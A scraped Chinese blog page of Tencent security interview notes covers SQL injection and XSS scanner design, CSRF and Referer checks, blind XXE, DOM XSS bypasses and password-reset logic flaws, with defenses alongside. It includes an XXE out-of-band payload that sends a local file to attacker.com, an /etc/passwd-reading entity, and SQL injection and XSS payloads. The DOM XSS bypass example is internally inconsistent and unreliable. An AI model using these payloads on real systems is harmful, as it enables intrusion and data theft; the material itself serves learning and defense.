当前位置: 首页 > wzjs >正文

个人网站源码模板郑州餐饮网站建设公司排名

个人网站源码模板,郑州餐饮网站建设公司排名,wordpress 防篡改,网站建设方案免费网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。、 目录 腾讯 - 一面 一、编写工具的具体思路(SQL注入、XSS、CSRF防御) 1. SQL注入检…

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

腾讯 - 一面

一、编写工具的具体思路(SQL注入、XSS、CSRF防御)

1. SQL注入检测工具设计

2. XSS检测工具设计

3. CSRF防御工具设计

二、Referer验证与空Referer防御

1. Referer验证机制

2. 空Referer的成因与防御

三、XXE无回显探测:DNS与内部实体利用

1. 带外数据外传(OOB)

2. 内部实体探测

3. 防御方案

四、XSS硬编码与DOM型XSS转义绕过

1. 硬编码XSS利用场景

2. DOM型XSS转义绕过

3. 防御方案

五、密码重置逻辑漏洞全解析

1. 验证步骤不一致

2. Token预测与枚举

3. 敏感数据返回

4. 前后端验证码不一致

5. 注入与XSS漏洞

腾讯 - 一面

编写工具的具体思路,sql注入,xss
csrf的防御    refer验证,refer为空则防御(referer是浏览器特性,为空除排除特性之外的问题则做防御验证)
xxe无回显探测  dns验证,内部实体探测
xss硬编码 如何利用 前端DOM型被js代码转义出来,比如\u300c,前端是返回在了js中,在html中除非举报某种标签,其特性可导致特殊编码执行,则能转义出来。
密码重置的逻辑问题-第一二三步验证不统一,验证统一但后台返回的更改密码的token可被预测,枚举可猜解,返回敏感数据,后端与前端验证码不一致,存在数据查询则可注入,xss编码问题。

一、编写工具的具体思路(SQL注入、XSS、CSRF防御)

1. SQL注入检测工具设计

核心思路:动态扫描 + 黑白名单验证 + 上下文感知

  1. 参数化查询检测
    静态分析代码中是否存在拼接SQL语句(如"SELECT * FROM users WHERE id = " + input),动态检测请求参数是否直接拼接至SQL逻辑。
    python# 检测SQL关键字(如UNION、SELECT) if re.search(r'\b(union |select|insert|update|delete|sleep|extractvalue)\b', payload, re.I): log_sql_injection_attempt() 
  2. Payload生成与模糊测试
    生成常见注入语句(如' OR 1=1 --; WAITFOR DELAY '0:0:5'),根据响应时间或内容差异判断是否存在漏洞。
  3. 上下文感知绕过检测
    针对预编译语句的绕过场景(如ORDER BY后接用户输入),构造数字型或布尔型盲注测试。
    sql-- 盲注测试:通过响应状态判断 SELECT * FROM users WHERE id = 1 AND (SELECT SUBSTRING(password,1,1) FROM users LIMIT 1) = 'a' 
2. XSS检测工具设计

核心思路:输入输出追踪 + DOM事件模拟 + 编码绕过检测

  1. 输入点识别与污染传播
    标记所有用户可控输入(如URL参数、表单字段),追踪数据流向(如innerHTMLdocument.write )。
  2. Payload动态执行检测
    插入探测脚本并监控是否触发弹窗或DOM修改:
    html<script> // 检测是否执行 window.xssDetected = true; </script> 
  3. 编码绕过测试
    测试HTML实体、Unicode、JS编码的绕过可能性:
    javascript// Unicode编码绕过 alert('\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029'); 
3. CSRF防御工具设计

核心思路:Token校验 + 同源策略验证 + 请求头检查

  1. CSRF Token生成与校验
    服务端生成随机Token并绑定至用户会话,前端通过隐藏字段提交:
    html<input type="hidden" name="csrf_token" value="RANDOM_STRING"> 
  2. SameSite Cookie属性
    设置Cookie的SameSite=StrictLax,限制跨域请求携带Cookie。
  3. Referer与Origin头验证
    校验请求头中的RefererOrigin是否属于合法域名。

二、Referer验证与空Referer防御

1. Referer验证机制
  • 合法场景
    • 用户从站内页面跳转至敏感操作(如支付页面)。
    • 限制跨域请求(如API接口仅允许指定来源)。
  • 防御逻辑
    pythondef check_referer(request): allowed_domains = ['example.com', 'trusted-site.com'] referer = request.headers.get('Referer') if referer and any(domain in referer for domain in allowed_domains): return True else: log_suspicious_request() return False 
2. 空Referer的成因与防御
  • 空Referer场景
    • 用户直接输入URL访问。
    • 浏览器隐私模式或插件屏蔽Referer。
    • 页面通过<meta>标签或JavaScript跳转。
  • 防御方案
    1. 多因素校验:结合CSRF Token、验证码、二次确认。
    2. 日志监控:记录空Referer请求,分析异常行为。
    3. 限制敏感操作:空Referer时仅允许低风险操作(如查看信息)。

三、XXE无回显探测:DNS与内部实体利用

1. 带外数据外传(OOB)
  • 原理:利用外部实体将数据通过DNS或HTTP请求发送至攻击者服务器。
  • Payload示例
    xml<!DOCTYPE data [ <!ENTITY % remote SYSTEM "http://attacker.com/xxe.dtd"> %remote; ]> <data>&send;</data> 
    xxe.dtd 内容
    xml<!ENTITY % payload "<!ENTITY send SYSTEM 'http://attacker.com/?leak=%file;'>"> %payload; 
2. 内部实体探测
  • 步骤
    1. 利用<!ENTITY % local_dtd SYSTEM "file:///etc/passwd">加载本地文件。
    2. 通过参数实体触发错误回显:
      xml<!ENTITY % error "<!ENTITY % leak SYSTEM 'file:///nonexistent/%local_dtd;'>"> %error; 
3. 防御方案
  • 禁用外部实体解析:
    java// Java示例 DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 

四、XSS硬编码与DOM型XSS转义绕过

1. 硬编码XSS利用场景
  • 案例
    前端代码将用户输入硬编码至JavaScript变量:
    javascriptvar userInput = "<%= encodeJavaScript(untrustedData) %>"; // 若编码不全,可构造闭合引号 userInput = "abc\"; alert(1);//"; 
  • 绕过方法
    利用JS字符串特性(如Unicode转义、模板字符串):
    javascript// Unicode转义执行 var payload = "\u003cimg src=x onerror=alert(1)\u003e"; 
2. DOM型XSS转义绕过
  • 场景
    用户输入经过JS转义后动态插入HTML,但转义规则存在缺陷:
    html<script> var data = "\u300cuserControlledData\u300d"; document.getElementById("output").innerHTML = data; </script> 
  • 利用方式
    构造闭合Unicode字符并插入HTML标签:
    javascript// 输入:\u300c</script><img src=x onerror=alert(1)>\u300c // 最终HTML: <script> var data = "</script><img src=x onerror=alert(1)>"; </script> 
3. 防御方案
  • 严格输出编码:根据上下文选择编码方式(HTML/JS/URL)。
  • CSP策略:限制脚本执行来源:
    httpContent-Security-Policy: script-src 'self' 

五、密码重置逻辑漏洞全解析

1. 验证步骤不一致
  • 案例
    第一步验证手机号,第二步验证邮箱,第三步直接允许重置密码。
  • 攻击方式
    攻击者完成第一步验证后,跳过后续步骤直接访问最终接口。
  • 防御
    确保所有步骤关联同一会话并顺序校验。
2. Token预测与枚举
  • 漏洞成因
    Token生成规则简单(如时间戳、连续数字)。
  • 检测方法
    生成多个Token测试是否可重复使用。
  • 防御
    使用强随机数(如UUID)并绑定用户身份。
3. 敏感数据返回
  • 案例
    重置接口返回用户ID、Token明文或密码哈希。
  • 防御
    仅返回必要状态信息,避免泄露敏感字段。
4. 前后端验证码不一致
  • 场景
    前端校验验证码后,后端未二次校验,导致可绕过。
  • 防御
    前后端统一校验逻辑,验证码一次性使用。
5. 注入与XSS漏洞
  • SQL注入
    重置接口的user_id参数未过滤:
    sqlUPDATE users SET password='...' WHERE id = 'userInput'; 
  • XSS漏洞
    重置成功页面回显用户邮箱未编码:
    html<div>重置链接已发送至<%= userEmail %></div> 
  • 防御
    参数化查询 + 输出编码。
http://www.dtcms.com/wzjs/823347.html

相关文章:

  • 做行业网站广告能赚多少钱手机软件公司
  • 自适应网站建设方案做的最好的微电影网站有哪些
  • 绍兴建站公司模板重大违法建设项目举报网站
  • 网站有些什么内容手机网站app制作
  • 建设通属于官方网站一千元做网站
  • 盐山县网站建设公司建立网站心得
  • 宁波网站建设企业施工企业搭建的彩钢房如何做账务
  • 网站开发公司可行报告网站设计的公司如何选
  • 网站seo优化多少钱软件开发工具的基本功能
  • 泉州做网站优化公司饮食网站首页页面
  • 仿贴吧的网站工业和信息化部发短信
  • 什么是行业网站?简单的j网站建设方案书
  • 建设论坛网站要备案兰州网站seo诊断
  • 网站对于企业的京东网上商城购买
  • php网站开发参考书籍sem优化是什么
  • 建立自己的网站用花钱吗google推广工具
  • 网站开发工程师 面试英语网站模板 源码之家
  • 适合机械网站的wordpress主题模板两学一做 网站源码
  • 网站建设阿里云wordpress 下载 主题
  • 网站建设 淘宝描述psd网站建设太金手指六六十一
  • 如何建免费的企业网站e福州是哪个公司开发
  • 帝国cms7.0网站地图网站建设策划书缺点
  • 平台网站建设教程视频家庭厨房做外卖网站
  • 免费网站打包appwordpress文章迁移
  • 校园网站建设网信阳建设企业网站公司
  • O2O网站制作需要多少钱域名及网站建设实验报告
  • 网站搭建价格修车店怎么做网站
  • 晋城网站建设网站油漆涂料网站建设
  • 手机在线做ppt的网站有哪些问题衡水网站建设设计
  • 建设学校网站的作用网站背景尺寸